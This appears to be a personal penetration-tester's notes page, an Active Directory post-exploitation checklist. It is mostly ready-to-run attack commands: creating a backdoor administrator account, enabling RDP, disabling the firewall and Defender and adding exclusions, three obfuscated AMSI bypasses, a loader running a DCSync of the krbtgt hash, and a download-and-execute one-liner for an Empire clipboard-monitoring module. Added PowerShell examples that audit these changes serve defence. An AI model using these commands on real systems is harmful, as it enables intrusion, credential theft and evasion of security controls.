yuyudhn's notes

Post Exploitation

Active Directory Post Exploitation Checklists

RDP Stuff

Add Local Administrator

Create user asuka and add to RDP, Admin, and WinRM.

net user asuka 'TrYh@rdeR!' /add
net localgroup "Remote Desktop Users" asuka /add
net localgroup "Administrators" asuka /add
net localgroup "Remote Management Users" asuka /add

Enable RDP Access

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

# If PowerShell is not available (e.g. on an old machine), use reg and netsh instead
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
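
The two checklists above change three things an auditor would want to verify afterwards: the `fDenyTSConnections` value, the "Remote Desktop" firewall rule group, and membership of the three privileged local groups. The following is an added example, not part of the original notes, that reports all three in one object so a host can be checked after an engagement or during an incident review. It assumes it runs elevated on the host being checked and that the groups carry their default English names; the function name `Get-RdpExposureReport` is an assumption of this example.

```powershell
# Added example (not from the original notes): audit the settings the
# "Add Local Administrator" and "Enable RDP Access" checklists change.
# Assumptions: run as an administrator on the host being checked; the
# group names are the default English names used in the checklist.
function Get-RdpExposureReport {
    $tsKey = 'HKLM:\System\CurrentControlSet\Control\Terminal Server'
    $deny  = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections

    # Any enabled inbound rule in the "Remote Desktop" group means 3389 is reachable through the host firewall
    $rdpRules   = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue
    $rdpAllowed = @($rdpRules | Where-Object { $_.Enabled -eq 'True' -and $_.Direction -eq 'Inbound' }).Count -gt 0

    # Privileged local groups touched by the "Add Local Administrator" checklist
    $groups  = 'Administrators', 'Remote Desktop Users', 'Remote Management Users'
    $members = foreach ($g in $groups) {
        Get-LocalGroupMember -Group $g -ErrorAction SilentlyContinue |
            ForEach-Object { [pscustomobject]@{ Group = $g; Member = $_.Name; Source = $_.PrincipalSource } }
    }

    [pscustomobject]@{
        Host            = $env:COMPUTERNAME
        RdpEnabled      = ($deny -eq 0)      # fDenyTSConnections = 0 means RDP is switched on
        RdpFirewallOpen = $rdpAllowed
        GroupMembers    = $members
    }
}

$report = Get-RdpExposureReport
$report | Select-Object Host, RdpEnabled, RdpFirewallOpen | Format-List
$report.GroupMembers | Format-Table -AutoSize
```

A local account created this way also leaves Security log events 4720 (user created) and 4732 (member added to a local group) on the host, which is where a detection rule for this checklist would normally start.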

Access RDP

xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/
rdesktop support.htb

# Fix ERRCONNECT_TLS_CONNECT_FAILED (older hosts that only offer weak TLS; lowers the client's OpenSSL security level)
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/ /tls-seclevel:0

Defender and Firewall Stuff

Turn Off Firewall

# powershell
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
# cmd
netsh advfirewall set allprofiles state off

Disable Defender Real Time Monitoring

# Remove the Defender signature definitions
cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Get-MpComputerStatus
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -ExclusionExtension "ps1"
Set-MpPreference -DisableBehaviorMonitoring $true

# Disable AMSI script scanning (set to 0 to re-enable)
Set-MpPreference -DisableScriptScanning 1

# List all excluded folders
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath
# Add a folder exclusion (useful when tamper protection blocks the settings above)
Add-MpPreference -ExclusionPath C:\Mimikatz\

# Disable Real Time Protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
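
Every setting in this section is visible afterwards through `Get-MpComputerStatus`, `Get-MpPreference` and the policy key it writes, so the same host can be checked for exactly these weakenings. The following is an added example, not part of the original notes, that collects those indicators into a list of findings; `Get-DefenderWeakeningReport` is a name chosen for this example, and it assumes a Windows 10/11 or Server host with the Defender cmdlets available, run elevated.

```powershell
# Added example (not from the original notes): report whether the Defender settings
# the section above weakens are currently in their weakened state.
# Assumptions: Defender cmdlets available (Windows 10/11 or Server); run elevated.
function Get-DefenderWeakeningReport {
    $status    = Get-MpComputerStatus
    $pref      = Get-MpPreference
    $policyKey = 'HKLM:\Software\Policies\Microsoft\Windows Defender'
    $policy    = Get-ItemProperty -Path $policyKey -ErrorAction SilentlyContinue

    $findings = @()
    if (-not $status.IsTamperProtected)         { $findings += 'Tamper Protection is off (Set-MpPreference changes are not blocked)' }
    if (-not $status.AntivirusEnabled)          { $findings += 'Antivirus engine reports disabled' }
    if (-not $status.RealTimeProtectionEnabled) { $findings += 'Real-time protection is disabled' }

    # Preference flags set by the Set-MpPreference lines above
    foreach ($flag in 'DisableRealtimeMonitoring', 'DisableIOAVProtection',
                      'DisableBehaviorMonitoring', 'DisableScriptScanning') {
        if ($pref.$flag) { $findings += "$flag is set" }
    }

    # Exclusions (a .ps1 extension or a tools folder is a typical sign of this checklist)
    foreach ($ext in @($pref.ExclusionExtension)) { if ($ext) { $findings += "Extension exclusion: $ext" } }
    foreach ($p   in @($pref.ExclusionPath))      { if ($p)   { $findings += "Path exclusion: $p" } }

    # Policy values written by the reg add lines above
    foreach ($name in 'DisableAntiSpyware', 'DisableAntiVirus') {
        if ($policy -and $policy.$name -eq 1) { $findings += "Policy value $name=1 under $policyKey" }
    }

    [pscustomobject]@{
        Host     = $env:COMPUTERNAME
        Findings = $findings
    }
}

$r = Get-DefenderWeakeningReport
if ($r.Findings.Count -eq 0) { "$($r.Host): no weakened Defender settings found" }
else { $r.Findings | ForEach-Object { "$($r.Host): $_" } }
```

Each change made through `Set-MpPreference` or `Add-MpPreference` is also logged as event 5007 in the `Microsoft-Windows-Windows Defender/Operational` log, which is what the script in the MDE Enum section below reads.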

Bypassing PowerShell Security

Using InviShell - https://github.com/OmerYa/Invisi-Shell

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

AMSI Bypass

$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)

Detection: https://github.com/RythmStick/AMSITrigger

OPSEC with Loader

C:\AD\Tools\Loader.exe -path http://172.16.100.67/SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Get-ClipboardContents

Monitors the clipboard on a specified interval for changes to copied text.

iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents

WADComs

WADComs is an interactive cheat sheet containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.

https://wadcoms.github.io/

Dump Saved Password

  • Mimikatz
  • BrowserStealer
  • LaZagne

TCP Port Scanner

# powershell
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.8.1",$_)) "Port $_ is open!"} 2>$null

Ping Sweep

# cmd
for /l %i in (1,1,254) do @ping -n 1 -w 100 172.16.8.%i > nul && echo 172.16.8.%i is up.

Inveigh

Responder, but in PowerShell/C#

https://github.com/Kevin-Robertson/Inveigh

MDE Enum

Enumerate Defender exclusions: how to extract Windows Defender exclusions and Attack Surface Reduction (ASR) rules without admin privileges.

https://github.com/0xsp-SRD/MDE_Enum

# local
mde-enum.exe /local /paths /access
# remote
mde-enum.exe <ip> <username> <password> <domain> /paths
# e.g.
.\mde-enum.exe 172.16.8.148 asuka Asuka@1337 child.zerobyte.lab /paths

Or, use this Powershell script.

$logName = "Microsoft-Windows-Windows Defender/Operational"
$eventID = 5007
$events = Get-WinEvent -LogName $logName | Where-Object { $_.Id -eq $eventID }
$exclusionEvents = $events | Where-Object { $_.Message -match "Exclusions" }
$pattern = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\[^\s]+"
$exclusionEvents | ForEach-Object {
    if ($_.Message -match $pattern) {
        $matches[0]
    }
}

Reference: https://x.com/VakninHai/status/1796628601535652289
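
The script above matches the registry path with `[^\s]+`, so an exclusion whose path contains a space (`C:\Program Files\Tools`) is cut short, and it cannot tell an exclusion being added from one being removed. The following is an added example, not part of the original notes or of MDE_Enum, that parses the "Old value" / "New value" lines of an event 5007 message and classifies each change, which is also how a defender would audit exclusion history on a host. It assumes the message layout `...\r\n\tOld value: <value>\r\n\tNew value: <value>` with exclusion keys of the form `HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\<Kind>\<entry> = 0x0`; the sample messages are constructed, not captured from a real host, and `ConvertFrom-DefenderConfigChange` is a name chosen for this example.

```powershell
# Added example (not from the original notes): parse Defender event 5007 messages
# into structured exclusion/setting changes. Assumption: the message carries
# "Old value: <value>" and "New value: <value>" lines as shown in the samples below.
function ConvertFrom-DefenderConfigChange {
    param(
        [Parameter(Mandatory)][string]$Message,
        [datetime]$TimeCreated = [datetime]::MinValue
    )
    # [^\r\n]* keeps the whole line, so paths with spaces survive intact
    $old = if ($Message -match 'Old value:[ \t]*([^\r\n]*)') { $Matches[1].Trim() } else { '' }
    $new = if ($Message -match 'New value:[ \t]*([^\r\n]*)') { $Matches[1].Trim() } else { '' }
    if (-not $old -and -not $new) { return $null }   # not a configuration-change message

    # Added: only a new value. Removed: only an old value. Changed: both present.
    $action = if ($new -and $old) { 'Changed' } elseif ($new) { 'Added' } else { 'Removed' }
    $value  = if ($new) { $new } else { $old }

    $result = [ordered]@{ Time = $TimeCreated; Action = $action; Kind = 'Setting'; Entry = $value }
    if ($value -match 'Windows Defender\\Exclusions\\(Paths|Extensions|Processes)\\(.+?)(?:\s*=\s*0x[0-9A-Fa-f]+)?$') {
        $result.Kind  = $Matches[1]   # Paths, Extensions or Processes
        $result.Entry = $Matches[2]   # the excluded path, extension or process
    }
    [pscustomobject]$result
}

# Constructed sample messages in the event 5007 layout (not captured from a real host)
$samples = @(
    "Windows Defender Antivirus Configuration has changed.`r`n`tOld value: `r`n`tNew value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Tools = 0x0",
    "Windows Defender Antivirus Configuration has changed.`r`n`tOld value: `r`n`tNew value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\.ps1 = 0x0",
    "Windows Defender Antivirus Configuration has changed.`r`n`tOld value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Mimikatz = 0x0`r`n`tNew value: ",
    "Windows Defender Antivirus Configuration has changed.`r`n`tOld value: HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = 0x0`r`n`tNew value: HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = 0x1"
)
$samples | ForEach-Object { ConvertFrom-DefenderConfigChange -Message $_ } | Where-Object { $_ } | Format-Table -AutoSize

# Same parser over the live log (needs read access to the Defender operational log):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007 } |
#     ForEach-Object { ConvertFrom-DefenderConfigChange -Message $_.Message -TimeCreated $_.TimeCreated } |
#     Where-Object { $_ }
```

On the constructed samples the output is one `Added` row for the `Paths` exclusion `C:\Program Files\Tools`, one `Added` row for the `Extensions` exclusion `.ps1`, one `Removed` row for `C:\Mimikatz`, and one `Changed` row of kind `Setting` for the real-time monitoring flag. Filtering the live log on `Kind -ne 'Setting'` gives the exclusion history alone.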

Other Useful Stuff

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
https://github.com/Flangvik/SharpCollection

Last updated 9 months ago
